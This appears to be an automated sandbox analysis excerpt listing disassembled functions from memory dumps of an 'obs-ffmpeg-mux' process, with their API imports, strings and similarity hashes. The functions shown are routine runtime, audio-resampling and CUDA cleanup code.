Instruction Fuzzy Hash: FF315A22A0AD22E1EB919F6298047BE2794FF45BE8F844631DD2E937D1DE3CD542E304

Function 00007FF649AA35E4 Relevance: 13.6, APIs: 9, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF649AA35F8
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF649AA360D
__scrt_release_startup_lock.LIBCMT ref: 00007FF649AA367B
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF649AA36C9
_get_initial_wide_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF649AA36CE
__p___wargv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF649AA36D6
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF649AA36DE
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF649AA3700
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF649AA375A

Memory Dump Source

Source File: 0000000B.00000002.2291350522.00007FF649AA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF649AA0000, based on PE: true

Associated: 0000000B.00000002.2291251062.00007FF649AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291384389.00007FF649AA5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291442922.00007FF649AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291474165.00007FF649AA9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff649aa0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: __p___argc__p___wargv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_initial_wide_environment_register_thread_local_exe_atexit_callback
String ID:
API String ID: 1184979102-0
Opcode ID: d1267e791b308d50114738cb6d3fcce0682459912f5f90b2ba963487117e6561
Instruction ID: bd1a2f3e2d7793b1eca3bf4a3ea5fd9ec115c8d97d66c09714f8e9ac0a0df1b1
Opcode Fuzzy Hash: d1267e791b308d50114738cb6d3fcce0682459912f5f90b2ba963487117e6561
Instruction Fuzzy Hash: 35314921E8C20387FA54BF25E4523BA7391AF55784F444038EA0EC76E3EE2DE8C48634

Function 00007FF8BFB62290 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 167COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF8BFB623A9

Strings

Mingw-w64 runtime failure:, xrefs: 00007FF8BFB622C8
Address %p has no image-section, xrefs: 00007FF8BFB62300, 00007FF8BFB62510
VirtualProtect failed with code 0x%x, xrefs: 00007FF8BFB624A2
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF8BFB624FC

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 177a0442ffddc2d8412e742cb8e5249e265e09483f4b31c5fb5574984be0ec8a
Instruction ID: a1640eb021950a2c3daf9855610039eb626ab88aaacc8b2e76b881868e8e1293
Opcode Fuzzy Hash: 177a0442ffddc2d8412e742cb8e5249e265e09483f4b31c5fb5574984be0ec8a
Instruction Fuzzy Hash: 4E61CF32B09B42A6FB108F99E845669B7A0FB49BD4F448235EB5C47B90EE3CE484C700

Function 00007FF8A7C887A0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 167COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF8A7C888B9

Strings

Address %p has no image-section, xrefs: 00007FF8A7C88810, 00007FF8A7C88A20
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF8A7C88A0C
Mingw-w64 runtime failure:, xrefs: 00007FF8A7C887D8
VirtualProtect failed with code 0x%x, xrefs: 00007FF8A7C889B2

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: a8cae70abf7ffee8518c3ea9921427e896fff9301f328d805a1cc0052b195cee
Instruction ID: 17502089697ad536eb635e2134183f3c44535591dfdc93a50a9ddb0f2ccd2a15
Opcode Fuzzy Hash: a8cae70abf7ffee8518c3ea9921427e896fff9301f328d805a1cc0052b195cee
Instruction Fuzzy Hash: 5361AE72B1AB42A6EB109F11E88426D77A1FB45BD0F544239EBAD477D5EE3CE580D300

Function 00007FF8BFB85F0A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB863F0: RtlPcToFileHeader.KERNEL32 ref: 00007FF8BFB86434
Part of subcall function 00007FF8BFB863F0: RaiseException.KERNEL32 ref: 00007FF8BFB8647A

RtlPcToFileHeader.KERNEL32 ref: 00007FF8BFB85FA7
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00007FF8BFB86003

Strings

Bad read pointer - no RTTI data!, xrefs: 00007FF8BFB86108
Access violation - no RTTI data!, xrefs: 00007FF8BFB85F0A, 00007FF8BFB8612B
Bad dynamic_cast!, xrefs: 00007FF8BFB86072
Attempted a typeid of nullptr pointer!, xrefs: 00007FF8BFB860E5

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
API String ID: 1852475696-928371585
Opcode ID: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
Instruction ID: d32f4f0aa600e8032ac7510b2150dcea80d767f76e03e96dbea36ed410b9ac5e
Opcode Fuzzy Hash: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
Instruction Fuzzy Hash: 7351C362B19A4692EE20DF9CE8906B96361FF84BD4F409435DB8D07766EF3CE505C700

Function 00007FF8BFB53F10 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 144COMMON

Download Yara Rule

APIs

av_free.AVUTIL-58 ref: 00007FF8BFB54056
av_log.AVUTIL-58 ref: 00007FF8BFB54139
abort.MSVCRT ref: 00007FF8BFB5413E

Strings

s->dither.method < SWR_DITHER_NB, xrefs: 00007FF8BFB54152
Assertion %s failed at %s:%d, xrefs: 00007FF8BFB5412E
src/libswresample/dither.c, xrefs: 00007FF8BFB54113, 00007FF8BFB5414B
*, xrefs: 00007FF8BFB5416A

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abortav_freeav_log
String ID: *$Assertion %s failed at %s:%d$s->dither.method < SWR_DITHER_NB$src/libswresample/dither.c
API String ID: 3300847756-1990850000
Opcode ID: ab30c3e9237167edfc00d8e6b718087be1c521b79e3897be0253280de5e0c4da
Instruction ID: 36cf6cff04ec9bf50c79797a130f9399cb93bcbec1659f6146f630b5705b0cec
Opcode Fuzzy Hash: ab30c3e9237167edfc00d8e6b718087be1c521b79e3897be0253280de5e0c4da
Instruction Fuzzy Hash: 46511872D18F4295EA26CBBC946217AF355EF563C4F548332D70E26694EF3DB08AC600

Function 00007FF8BFB8E148 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8E1BC
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8E1CB
DName::operator+=.LIBVCRUNTIME ref: 00007FF8BFB8E2E8

Part of subcall function 00007FF8BFB8C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C459
Part of subcall function 00007FF8BFB8C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C492
Part of subcall function 00007FF8BFB8C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C7BB

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8E26B
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8E27B
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8E325

Strings

{for , xrefs: 00007FF8BFB8E1F4

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+$Name::operator+=
String ID: {for
API String ID: 179159573-864106941
Opcode ID: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
Instruction ID: d9aab5f11e3996da5c57b66349044b41bf7e1bd3e1c2c48d2c0c8ced17c69c6c
Opcode Fuzzy Hash: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
Instruction Fuzzy Hash: 3A515B72A08A85A9E7119FA8D4813EC77A1FB857C8F808035EB4C4BB9ADF7CD555C340

Function 00007FF8A7BFD650 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 101COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FF8A7BFD6EA
free.MSVCRT ref: 00007FF8A7BFD6F3

Strings

Calling %s, xrefs: 00007FF8A7BFD695, 00007FF8A7BFD728
-> %s: %s, xrefs: 00007FF8A7BFD79E
%s failed, xrefs: 00007FF8A7BFD771
cu->cuCtxDestroy(hwctx->cuda_ctx), xrefs: 00007FF8A7BFD68E, 00007FF8A7BFD7DF
cu->cuDevicePrimaryCtxRelease(hwctx->internal->cuda_device), xrefs: 00007FF8A7BFD721, 00007FF8A7BFD76A

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: FreeLibraryfree
String ID: -> %s: %s$%s failed$Calling %s$cu->cuCtxDestroy(hwctx->cuda_ctx)$cu->cuDevicePrimaryCtxRelease(hwctx->internal->cuda_device)
API String ID: 155010425-3275200884
Opcode ID: 5bf74a7dc137a0c155993daea2b6d87e70908d77a28ad94112a4fe68d911b2e3
Instruction ID: 385a3de534df0f6a57794e3e8028e7d9799a20f514af6628d49ed95eab0f4ade
Opcode Fuzzy Hash: 5bf74a7dc137a0c155993daea2b6d87e70908d77a28ad94112a4fe68d911b2e3
Instruction Fuzzy Hash: 19415965A0BA86A2EB589F21E410BBE6361FB44BC4F844032DE9E17394CF7CE456E340

Function 00007FF8BFB56770 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB58F70: av_freep.AVUTIL-58 ref: 00007FF8BFB5909C

memcpy.MSVCRT ref: 00007FF8BFB56814
av_log.AVUTIL-58 ref: 00007FF8BFB56865
abort.MSVCRT ref: 00007FF8BFB5686A
av_freep.AVUTIL-58 ref: 00007FF8BFB56885

Strings

a->planar, xrefs: 00007FF8BFB56846
src/libswresample/resample.c, xrefs: 00007FF8BFB5683F
Assertion %s failed at %s:%d, xrefs: 00007FF8BFB56856

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_freep$abortav_logmemcpy
String ID: Assertion %s failed at %s:%d$a->planar$src/libswresample/resample.c
API String ID: 932020481-1037444191
Opcode ID: 2fed7eb9d3f7d8d6d6ab3b2d75b72cd75ee98cc0c08d437b01389e601e0e5f9a
Instruction ID: 9a25b592f03a3b0d0954eaaddd7971b069af8aa54a42fb5e618c366409c241b3
Opcode Fuzzy Hash: 2fed7eb9d3f7d8d6d6ab3b2d75b72cd75ee98cc0c08d437b01389e601e0e5f9a
Instruction Fuzzy Hash: 0431E033F052829BEB25DBA998511BDB3A2FB88799F498135DF094B745DE3CE602C740

Function 00007FF8A7C89860 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF8A7C89878
_errno.MSVCRT ref: 00007FF8A7C89897
rand.MSVCRT ref: 00007FF8A7C89910
_sopen.MSVCRT ref: 00007FF8A7C8995F
_errno.MSVCRT ref: 00007FF8A7C89970

Strings

XXXX, xrefs: 00007FF8A7C8988F
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 00007FF8A7C898FE

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno$_sopenrandstrlen
String ID: XXXX$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
API String ID: 1081397658-1416102993
Opcode ID: 7ac93ad39a8cb676dc86535b40274021b571b1fd82cfda16182900e2eb2af889
Instruction ID: fb33df12a70f887c5002c8ac1ce95a0007d72291cae2c139b9f311e44833d0e5
Opcode Fuzzy Hash: 7ac93ad39a8cb676dc86535b40274021b571b1fd82cfda16182900e2eb2af889
Instruction Fuzzy Hash: 003198A3E0B553BAFB619E249D0017C5A90EB457E6F898231CE0C477C0EE3DE802E310

Function 00007FF8A7C0C1D0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strspn.MSVCRT ref: 00007FF8A7C0C1FC
strspn.MSVCRT ref: 00007FF8A7C0C245
strchr.MSVCRT ref: 00007FF8A7C0C25D
memcpy.MSVCRT ref: 00007FF8A7C0C28C

Strings

ambisonic , xrefs: 00007FF8A7C0C1D7
, xrefs: 00007FF8A7C0C1EF, 00007FF8A7C0C23B

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strspn$memcpystrchr
String ID: $ambisonic
API String ID: 2918080867-3257024572
Opcode ID: 0f5482def2ad202852d1b32bcf54bb77238b5e8d6a621b367dc68f81b01bffa8
Instruction ID: b21f6c8499cd69d6f73cdb2ea75f6a7157d5e7f30bb244d2c61d54ef5da4ffae
Opcode Fuzzy Hash: 0f5482def2ad202852d1b32bcf54bb77238b5e8d6a621b367dc68f81b01bffa8
Instruction Fuzzy Hash: 6B310523B0AA42A0EB309F7599501FE2791EF497D4F488032EE1D97B85EE3CE142E240

Function 00007FF8BFB868AC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFB86A6B,?,?,00000000,00007FF8BFB8689C,?,?,?,?,00007FF8BFB865E5), ref: 00007FF8BFB86931
GetLastError.KERNEL32(?,?,?,00007FF8BFB86A6B,?,?,00000000,00007FF8BFB8689C,?,?,?,?,00007FF8BFB865E5), ref: 00007FF8BFB8693F
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8BFB86A6B,?,?,00000000,00007FF8BFB8689C,?,?,?,?,00007FF8BFB865E5), ref: 00007FF8BFB86958
LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFB86A6B,?,?,00000000,00007FF8BFB8689C,?,?,?,?,00007FF8BFB865E5), ref: 00007FF8BFB8696A
FreeLibrary.KERNEL32(?,?,?,00007FF8BFB86A6B,?,?,00000000,00007FF8BFB8689C,?,?,?,?,00007FF8BFB865E5), ref: 00007FF8BFB869B0
GetProcAddress.KERNEL32(?,?,?,00007FF8BFB86A6B,?,?,00000000,00007FF8BFB8689C,?,?,?,?,00007FF8BFB865E5), ref: 00007FF8BFB869BC

Strings

api-ms-, xrefs: 00007FF8BFB86951

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
String ID: api-ms-
API String ID: 916704608-2084034818
Opcode ID: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
Instruction ID: a9f4bc84fae163994e6a63c5eb242186ebe8f882cc15f44d07dc5421ec7d0e92
Opcode Fuzzy Hash: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
Instruction Fuzzy Hash: 48319421A1A69191EE15DB8AE8005B56395FF88BE0F594539DF2D0B395DF3CE944C700

Function 00007FF8A7BF0D30 Relevance: 12.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A7BF0E09
memcpy.MSVCRT ref: 00007FF8A7BF0E31
memcpy.MSVCRT ref: 00007FF8A7BF0E64
_aligned_free.MSVCRT ref: 00007FF8A7BF0EFD
_aligned_free.MSVCRT ref: 00007FF8A7BF0F22
_aligned_free.MSVCRT ref: 00007FF8A7BF0F2B
_aligned_free.MSVCRT ref: 00007FF8A7BF0F34
_aligned_free.MSVCRT ref: 00007FF8A7BF0F3C

Part of subcall function 00007FF8A7BF09B0: _aligned_free.MSVCRT ref: 00007FF8A7BF0AA6
Part of subcall function 00007FF8A7BF09B0: _aligned_free.MSVCRT ref: 00007FF8A7BF0ADD
Part of subcall function 00007FF8A7BF09B0: _aligned_free.MSVCRT ref: 00007FF8A7BF0AFA
Part of subcall function 00007FF8A7BF09B0: _aligned_free.MSVCRT ref: 00007FF8A7BF0B03
Part of subcall function 00007FF8A7BF09B0: _aligned_free.MSVCRT ref: 00007FF8A7BF0B0C
Part of subcall function 00007FF8A7BF09B0: _aligned_free.MSVCRT ref: 00007FF8A7BF0B14
Part of subcall function 00007FF8A7BF09B0: _aligned_free.MSVCRT ref: 00007FF8A7BF0B1D
Part of subcall function 00007FF8A7BF09B0: _aligned_free.MSVCRT ref: 00007FF8A7BF0B27
Part of subcall function 00007FF8A7BF09B0: _aligned_free.MSVCRT ref: 00007FF8A7BF0B31

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free$memcpy
String ID:
API String ID: 2399556850-0
Opcode ID: 3c9d650dbb13996a3ec22da08a15398705cb45436fe499cb8ebfbe706efbcf1e
Instruction ID: 9f14a77ce804e3a8246355e9f87e2e510138db36a26cc872041b8f5e7047ab0f
Opcode Fuzzy Hash: 3c9d650dbb13996a3ec22da08a15398705cb45436fe499cb8ebfbe706efbcf1e
Instruction Fuzzy Hash: 53519F76F1AA5595EB549F15E44436DA7A0FB88FC4F044035EE8E07BA5DF7CE842A300

Function 00007FF8BFB827CC Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB82886
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB828A5
__AdjustPointer.LIBCMT ref: 00007FF8BFB828E6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB828F3
__AdjustPointer.LIBCMT ref: 00007FF8BFB8292F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB82944
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB82989
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB82990

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

